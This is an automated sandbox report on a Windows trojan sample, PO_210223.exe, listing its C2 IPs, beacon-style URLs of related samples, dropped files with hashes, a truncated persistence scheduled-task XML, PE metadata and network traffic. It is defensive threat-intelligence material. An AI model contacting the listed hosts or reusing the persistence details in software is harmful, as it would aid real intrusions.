http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2 | ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnt7o | PO_210223.exe, 00000000.00000003.647129278.0000000008256000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
204.11.56.48 | unknown | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INC (VG) | true
103.66.59.142 | unknown | Hong Kong | 40065 | CNSERVERS (US) | true
23.229.197.103 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLC (US) | true

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:356494
                                                    Start date:23.02.2021
                                                    Start time:08:57:40
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 34s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:PO_210223.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:23
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@10/4@3/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 14.7% (good quality ratio 12.2%)
                                                    • Quality average: 64.6%
                                                    • Quality standard deviation: 36.1%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 51.104.139.180, 52.113.196.254, 104.43.139.144, 92.122.145.220, 168.61.161.212, 205.185.216.10, 205.185.216.42, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.144.132
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
08:58:35 | API Interceptor | 1x Sleep call for process: PO_210223.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

Match: 204.11.56.48
Associated Sample Name / URL | Detection | Context
RFQ Manual Supersucker en Espaol.xlsx | malicious | www.bigias.com/dgn/?Yzrp=LfNQbftNF2CZK3Pdbvfs/GUpg4UhIVB9HREii+G/2FPSQnC/ZhagFrpEcGqY3PnsjIPUew==&Lzrl=k6fTBXMx9H
8nxKYwJna8.exe | malicious | www.wood-decor24.com/csv8/?UT=EhUhb4&OjKL3=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvp2wRjK1uE1w
win32.exe | malicious | www.buythinsecret.com/incn/?8pBP5p=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06IZ75j/ocR9F&L6Ah=2dSLFXghYtFd0
mitbjisfe.js | malicious | urchintelemetry.com/
Details...exe | malicious | www.coolgadgetsdominate.com/t052/?pPX=6CpI00+2HCKGB1JbH22k369411uOsTuNarkGYMnsdTbHzEXKI/PSljtTQWzMzlp4SIHA&1b=jnKtRfexr
Fdj5vhj87S.exe | malicious | www.buythinsecret.com/incn/?2de=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06L5BpyfQG2cC&2dpxxT=i6MpbxRhTzX8wRbP
Statement Of Account.exe | malicious | www.perphaseelectronics.com/sz0m/?Kh=HN60TPe8&GvIHh=TGzqOvQKUvlZAzOTrBjC19//UpjckKets6PHJd4ZAWTshAj7ZEPkQjI0VseEDOP7xUYnIWwQiw==
yxYmHtT7uT.exe | malicious | www.wood-decor24.com/csv8/?Aro=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqaKSimOtzUhnn+APQ==&EHU40X=gbWtoXjpHB
spptqzbEyNlEJvj.exe | malicious | www.become-flightattendant.com/umSa/?Bn=d8+Yc1Kqdgg0yWZra+sA0ykjlSaGatnyagLIGXz6IWosdhkxYMJxV2/awb2OazI1/ohH&Rv=Y2JToVAX_DCpOHB
pHUWiFd56t.exe | malicious | www.wood-decor24.com/csv8/?Rxl=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqWKByqN0jU3&LJB=GbtlyLR0j
Q38V8rfI5H.js | malicious | legitville.com/0.html
Q38V8rfI5H.js | malicious | legitville.com/0.html
Z4VzMe8IqZ.js | malicious | urchintelemetry.com/
Z4VzMe8IqZ.js | malicious | urchintelemetry.com/
test.bat | malicious | local-update.com/banana.png
SecuriteInfo.com.Heur.16160.xls | malicious | www.heretangier.com/p2he/?cF=CXY0HpOvAiNao/7hyD46ZbvJkOBYOaiMbMD/1gQDGANTp/VCja9vaOiD7B1AqPi5K6pAxQ==&SBZ=epg8b
YT0nfh456s.exe | malicious | www.wood-decor24.com/csv8/?jFNHHj=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvqWKByqN0jU3&Ppd=_6g8yvxH-6HLN
payment advise.exe | malicious | www.couponquote.com/rbe/?8pV=_TJP3HkXZXxT3Te&lJBxWNm=NmtmFq3bM1GRjzQAFWXZGZs3nJJTmL04NhsM+Fht47V2qooXGZt1Rr5A9fSZbB9GvZz2
NEW URGENT ORDER FROM PUK ITALIA GROUP SRL.EXE | malicious | www.starstylishinstitute.com/k47/?r6=GbwDj4ypT&-ZU=33t3A7xB80u5YuyQF102BXSRJYIHEjWKu55cOthnVryNN9gNL+MJJIyFRKYoAf86uF3O
Spisemuligheds4.exe | malicious | www.momentsbyjordan.com/gpb6/?SBtxlt=lxlHQfw0FrIH&2d=gqgpWAjeEz0jXgJI2O1sVbKbB5UJYpIgFLCmC8Bdjh8wHvxJiiG9zRydokK2P49lkh4X

                                                    Domains

                                                    No context

                                                    ASN

Match: CONFLUENCE-NETWORK-INC (VG)
Associated Sample Name / URL | Detection | Context
AWB-INVOICE_PDF.exe | malicious | 208.91.197.91
X1(1).xlsm | malicious | 66.81.204.228
RFQ Manual Supersucker en Espaol.xlsx | malicious | 204.11.56.48
X1(1).xlsm | malicious | 66.81.204.228
DHL Document. PDF.exe | malicious | 208.91.197.91
X1(1).xlsm | malicious | 66.81.204.228
quotation10204168.dox.xlsx | malicious | 208.91.197.27
CX2 RFQ.xlsm | malicious | 66.81.204.228
CX2 RFQ.xlsm | malicious | 66.81.204.228
C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm | malicious | 66.81.204.228
C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm | malicious | 66.81.204.228
C1.Qoute-Purequest Air Filtration Technologies (Pty) Ltd.xlsm | malicious | 66.81.204.228
HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe | malicious | 208.91.197.39
Shipping Document PL&BL Draft.exe | malicious | 208.91.197.91
0C18PUs3bt.exe | malicious | 208.91.197.27
Quotation.exe | malicious | 209.99.64.55
Credit Card & Booking details.exe | malicious | 208.91.197.27
DnHeI10lQ6.exe | malicious | 209.99.40.222
Quotation.exe | malicious | 209.99.64.55
Payment advice.xls | malicious | 209.99.40.222

Match: CNSERVERS (US)
Associated Sample Name / URL | Detection | Context
DHL Document. PDF.exe | malicious | 154.86.13.178
SHED.EXE | malicious | 172.247.179.59
#U6211#U662f#U56fe#U7247.exe | malicious | 23.224.244.116
Parcel _009887 .exe | malicious | 45.205.32.159
Swift_Payment_jpeg.exe | malicious | 154.91.163.79
RFQ 2027376.xlsx | malicious | 23.224.206.44
dll.dll | malicious | 154.222.24.167
im.exe | malicious | 103.66.58.214
8nxKYwJna8.exe | malicious | 156.251.194.127
d6DdOfC2CX.exe | malicious | 154.202.47.2
IRS_Microsoft_Excel_Document_xls.jar | malicious | 45.142.156.44
WlBvCPCRcs.exe | malicious | 23.225.97.176
8foMX5QfDT.exe | malicious | 104.255.229.20
8GgbjB3BpU.exe | malicious | 172.83.155.157
CMA CGM Shipping Documents COAU7014424560.xlsx | malicious | 23.225.97.176
Inquiry_73834168_.xlsx | malicious | 154.91.154.163
Report-preview01.20.exe | malicious | 172.83.155.149
KtJsMM8kdE.exe | malicious | 156.251.194.127
Fdj5vhj87S.exe | malicious | 154.91.154.163
Shipping Document PL&BL Draft.exe | malicious | 104.255.229.21

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_210223.exe.log
                                                    Process:C:\Users\user\Desktop\PO_210223.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1314
                                                    Entropy (8bit):5.350128552078965
                                                    Encrypted:false
                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                    C:\Users\user\AppData\Local\Temp\tmp33D2.tmp
                                                    Process:C:\Users\user\Desktop\PO_210223.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1642
                                                    Entropy (8bit):5.176262409235197
                                                    Encrypted:false
                                                    SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGGtn:cbhK79lNQR/rydbz9I3YODOLNdq3F
                                                    MD5:14CFB330CC1F251E200D3DF339B27897
                                                    SHA1:D203DB04E55F6224C704FBF3BF5A1654A22D4C24
                                                    SHA-256:84CDADDE88E64BDF5193CBD7CA5FDAFF6C835E095EEE55053553413F7F3A588F
                                                    SHA-512:EB556DCF6EAC7196F52C607803DFBE4DEF8B9346F5AA25FFE1B2BB850088E54524E6596F67B591BC0C2143B275C55001201B065E32CC752B197A30780B3BC2DF
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                    C:\Users\user\AppData\Roaming\kwqifureL.exe
                                                    Process:C:\Users\user\Desktop\PO_210223.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):802304
                                                    Entropy (8bit):7.2424881132869325
                                                    Encrypted:false
                                                    SSDEEP:12288:9ORam/OrNbZTlgJqfsRVeh58JtAZUdt4odT9YdxOI/aFOAhIE+TtORqH4O4H1rVR:QFiJNlFfdkP4odidxTCEd2
                                                    MD5:E40AF9745E938B72D5D860BBC679AEBF
                                                    SHA1:D9E750061417B0CA9F933DB79C99C12934ABBE84
                                                    SHA-256:38ACC90CD6D33B61B99CCA8CF06781E1BD2AB8FFEBC3A33E036ECA36037D413B
                                                    SHA-512:2124A0CB2135BFC5731554AAA534E6BA9063137450E5DF18A56C8DD661D8D926278C1D658F1AEF44D3522598E047F4735CA5A06CEF41BE3593101A089F3494BA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 43%
                                                    Reputation:low
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q4`..............P..*...........I... ...`....@.. ....................................@.................................XI..S....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............<..............@..B.................I......H.......HY..........B....O..X...........................................kh.6.v.h.j...@..'.h.BD..c."~-...^.....r.S...R....!.Z...#i......8..4.2,..5.aw!D...0.Z%....Z.w(....a...y..u...?.[...j....a0.`2.\........d..w..G..}.D....<..`.C.....A....5....s.A....U..Pff..DF.... N.g..e.(........3.).<..;6.F.x%...q.f.=+.Q............./A1CHt....2....G?.+..m...3.G.B...*...i.A..C......R...BE....R..b..1t....Z....z`..P.. ...~XS!R.(.........T.o....D...b..lM.<+0..p..$.fd......H..j
                                                    C:\Users\user\AppData\Roaming\kwqifureL.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\PO_210223.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: [ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.2424881132869325
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:PO_210223.exe
                                                    File size:802304
                                                    MD5:e40af9745e938b72d5d860bbc679aebf
                                                    SHA1:d9e750061417b0ca9f933db79c99c12934abbe84
                                                    SHA256:38acc90cd6d33b61b99cca8cf06781e1bd2ab8ffebc3a33e036eca36037d413b
                                                    SHA512:2124a0cb2135bfc5731554aaa534e6ba9063137450e5df18a56c8dd661d8d926278c1d658f1aef44d3522598e047f4735ca5a06cef41be3593101a089f3494ba
                                                    SSDEEP:12288:9ORam/OrNbZTlgJqfsRVeh58JtAZUdt4odT9YdxOI/aFOAhIE+TtORqH4O4H1rVR:QFiJNlFfdkP4odidxTCEd2
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q4`..............P..*...........I... ...`....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4c49ae
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x60345188 [Tue Feb 23 00:51:20 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0xc4958          0x53          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc6000          0xfe8         .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc8000          0xc           .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                    Sections

                                                    Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                    .text   0x2000           0xc29b4       0xc2a00   False     0.699083273121   data       7.247286296      IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc   0xc6000          0xfe8         0x1000    False     0.399658203125   data       5.00156812291    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc  0xc8000          0xc           0x200     False     0.044921875      data       0.0980041756627  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    Name         RVA      Size   Type                                             Language  Country
                                                    RT_VERSION   0xc60a0  0x334  data
                                                    RT_MANIFEST  0xc63d4  0xc0f  XML 1.0 document, UTF-8 Unicode (with BOM) text

                                                    Imports

                                                    DLL          Import
                                                    mscoree.dll  _CorExeMain

                                                    Version Infos

                                                    Description       Data
                                                    Translation       0x0000 0x04b0
                                                    LegalCopyright    Copyright 2018
                                                    Assembly Version  1.0.0.0
                                                    InternalName      UCOMITypeComp.exe
                                                    FileVersion       1.0.0.0
                                                    CompanyName
                                                    LegalTrademarks
                                                    Comments
                                                    ProductName       RegisterVB
                                                    ProductVersion    1.0.0.0
                                                    FileDescription   RegisterVB
                                                    OriginalFilename  UCOMITypeComp.exe

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    Timestamp                          Source Port  Dest Port  Source IP       Dest IP
                                                    Feb 23, 2021 08:59:45.696063042 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:45.858366966 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:45.858566999 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:45.858961105 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.021274090 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.287998915 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288073063 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288115978 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288146973 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288218975 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288261890 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288300037 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288306952 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.288347960 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.288388968 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.288444042 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.346735954 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.369762897 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.370002985 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.450568914 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.450594902 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.450609922 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.450627089 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.450850010 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.509321928 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.509608984 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 08:59:46.532135963 CET  80           49763      204.11.56.48    192.168.2.4
                                                    Feb 23, 2021 08:59:46.532339096 CET  49763        80         192.168.2.4     204.11.56.48
                                                    Feb 23, 2021 09:00:04.907589912 CET  49765        80         192.168.2.4     103.66.59.142
                                                    Feb 23, 2021 09:00:05.238830090 CET  80           49765      103.66.59.142   192.168.2.4
                                                    Feb 23, 2021 09:00:05.239036083 CET  49765        80         192.168.2.4     103.66.59.142
                                                    Feb 23, 2021 09:00:05.239259958 CET  49765        80         192.168.2.4     103.66.59.142
                                                    Feb 23, 2021 09:00:05.567799091 CET  80           49765      103.66.59.142   192.168.2.4
                                                    Feb 23, 2021 09:00:05.594891071 CET  80           49765      103.66.59.142   192.168.2.4
                                                    Feb 23, 2021 09:00:05.594916105 CET  80           49765      103.66.59.142   192.168.2.4
                                                    Feb 23, 2021 09:00:05.595118046 CET  49765        80         192.168.2.4     103.66.59.142
                                                    Feb 23, 2021 09:00:05.595191956 CET  49765        80         192.168.2.4     103.66.59.142
                                                    Feb 23, 2021 09:00:05.925678968 CET  80           49765      103.66.59.142   192.168.2.4
                                                    Feb 23, 2021 09:00:25.861310005 CET  49767        80         192.168.2.4     23.229.197.103
                                                    Feb 23, 2021 09:00:26.050574064 CET  80           49767      23.229.197.103  192.168.2.4
                                                    Feb 23, 2021 09:00:26.050730944 CET  49767        80         192.168.2.4     23.229.197.103
                                                    Feb 23, 2021 09:00:26.050930977 CET  49767        80         192.168.2.4     23.229.197.103
